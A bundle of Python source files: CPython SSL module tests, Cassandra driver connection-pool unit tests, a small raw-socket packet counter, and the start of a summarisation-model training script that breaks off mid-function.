with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # The certificate from other_context (SIGNED_CERTFILE2) was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_host_connection_pool.py
|
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from mock import Mock, NonCallableMagicMock
from threading import Thread, Event, Lock
from cassandra.cluster import Session
from cassandra.connection import Connection
from cassandra.pool import Host, HostConnectionPool, NoConnectionsAvailable
from cassandra.policies import HostDistance, SimpleConvictionPolicy
class HostConnectionPoolTests(unittest.TestCase):
def make_session(self):
session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace')
session.cluster.get_core_connections_per_host.return_value = 1
session.cluster.get_max_requests_per_connection.return_value = 1
session.cluster.get_max_connections_per_host.return_value = 1
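        # One core connection, one in-flight request per connection and one
        # connection max, so a single borrowed request saturates the pool.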
return session
def test_borrow_and_return(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
c, request_id = pool.borrow_connection(timeout=0.01)
self.assertIs(c, conn)
self.assertEqual(1, conn.in_flight)
conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace')
pool.return_connection(conn)
self.assertEqual(0, conn.in_flight)
self.assertNotIn(conn, pool._trash)
def test_failed_wait_for_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
conn.in_flight = conn.max_request_id
# we're already at the max number of requests for this connection,
        # so this should fail
self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0)
def test_successful_wait_for_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock())
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
def get_second_conn():
c, request_id = pool.borrow_connection(1.0)
self.assertIs(conn, c)
pool.return_connection(c)
t = Thread(target=get_second_conn)
t.start()
pool.return_connection(conn)
t.join()
self.assertEqual(0, conn.in_flight)
def test_all_connections_trashed(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock())
session.cluster.connection_factory.return_value = conn
session.cluster.get_core_connections_per_host.return_value = 1
# manipulate the core connection setting so that we can
# trash the only connection
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.get_core_connections_per_host.return_value = 0
pool._maybe_trash_connection(conn)
session.cluster.get_core_connections_per_host.return_value = 1
submit_called = Event()
def fire_event(*args, **kwargs):
submit_called.set()
session.submit.side_effect = fire_event
def get_conn():
conn.reset_mock()
c, request_id = pool.borrow_connection(1.0)
self.assertIs(conn, c)
self.assertEqual(1, conn.in_flight)
conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace')
pool.return_connection(c)
t = Thread(target=get_conn)
t.start()
submit_called.wait()
self.assertEqual(1, pool._scheduled_for_creation)
session.submit.assert_called_once_with(pool._create_new_connection)
# now run the create_new_connection call
pool._create_new_connection()
t.join()
self.assertEqual(0, conn.in_flight)
def test_spawn_when_at_max(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
conn.max_request_id = 100
session.cluster.connection_factory.return_value = conn
# core conns = 1, max conns = 2
session.cluster.get_max_connections_per_host.return_value = 2
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
# make this conn full
conn.in_flight = conn.max_request_id
# we don't care about making this borrow_connection call succeed for the
# purposes of this test, as long as it results in a new connection
# creation being scheduled
self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0)
session.submit.assert_called_once_with(pool._create_new_connection)
def test_return_defunct_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_defunct = True
session.cluster.signal_connection_failure.return_value = False
pool.return_connection(conn)
        # the connection should be closed and a new creation scheduled
conn.close.assert_called_once()
session.submit.assert_called_once()
self.assertFalse(pool.is_shutdown)
def test_return_defunct_connection_on_down_host(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_defunct = True
session.cluster.signal_connection_failure.return_value = True
pool.return_connection(conn)
        # the connection should be closed and the pool shut down;
        # no new connection creation is scheduled
session.cluster.signal_connection_failure.assert_called_once()
conn.close.assert_called_once()
self.assertFalse(session.submit.called)
self.assertTrue(pool.is_shutdown)
def test_return_closed_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_closed = True
session.cluster.signal_connection_failure.return_value = False
pool.return_connection(conn)
# a new creation should be scheduled
session.submit.assert_called_once()
self.assertFalse(pool.is_shutdown)
def test_host_instantiations(self):
"""
Ensure Host fails if not initialized properly
"""
self.assertRaises(ValueError, Host, None, None)
self.assertRaises(ValueError, Host, '127.0.0.1', None)
self.assertRaises(ValueError, Host, None, SimpleConvictionPolicy)
def test_host_equality(self):
"""
Test host equality has correct logic
"""
a = Host('127.0.0.1', SimpleConvictionPolicy)
b = Host('127.0.0.1', SimpleConvictionPolicy)
c = Host('127.0.0.2', SimpleConvictionPolicy)
        self.assertEqual(a, b, 'Two Host instances should be equal when sharing the same address.')
self.assertNotEqual(a, c, 'Two Host instances should NOT be equal when using two different addresses.')
self.assertNotEqual(b, c, 'Two Host instances should NOT be equal when using two different addresses.')
|
packet_filter_tcp_udp_icmp.py
|
import socket,sys,threading,time
from struct import *
s1=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_TCP)
s2=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_UDP)
s3=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_ICMP)
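# One raw socket per protocol; each counter thread below reads from its own
# socket and increments the shared counters.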
count=0
tcp=0
icmp=0
udp=0
def printvalues():
global udp
global tcp
global icmp
print "udp :"+str(udp)+" tcp :"+str(tcp)+" icmp:"+str(icmp)
def tcpcount():
global count
global tcp
while True:
if count>200:
printvalues()
sys.exit()
packet=s1.recvfrom(65565)
print packet
count+=1
tcp+=1
# time.sleep(1)
def udpcount():
global count
global udp
while True:
if count>200:
printvalues()
sys.exit()
packet=s2.recvfrom(65565)
print packet
count+=1
udp+=1
# time.sleep(1)
def icmpcount():
global count
global icmp
while True:
if count>200:
printvalues()
sys.exit()
packet=s3.recvfrom(65565)
print packet
count+=1
icmp+=1
# time.sleep(1)
lock=threading.Lock()
lock.acquire()
threading.Thread(target=tcpcount).start()
threading.Thread(target=udpcount).start()
threading.Thread(target=icmpcount).start()
print "hi"
lock.release()
#while count<200:
# count+=1
# packet=s.recvfrom(65565)
# print packet
# packet=packet[0]
# ip_header=packet[0:20]
# iph = unpack('!BBHHHBBH4s4s' , ip_header)
# protocol=iph[6]
# print protocol
# p=int(protocol)
# if p==1:
# icmp+=1
# elif p==6:
# tcp+=1
# elif p==17:
# udp+=1
#threading.Thread(target=tcpcount).start()
#threading.Thread(target=udpcount).start()
#threading.Thread(target=icmpcount).start()
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
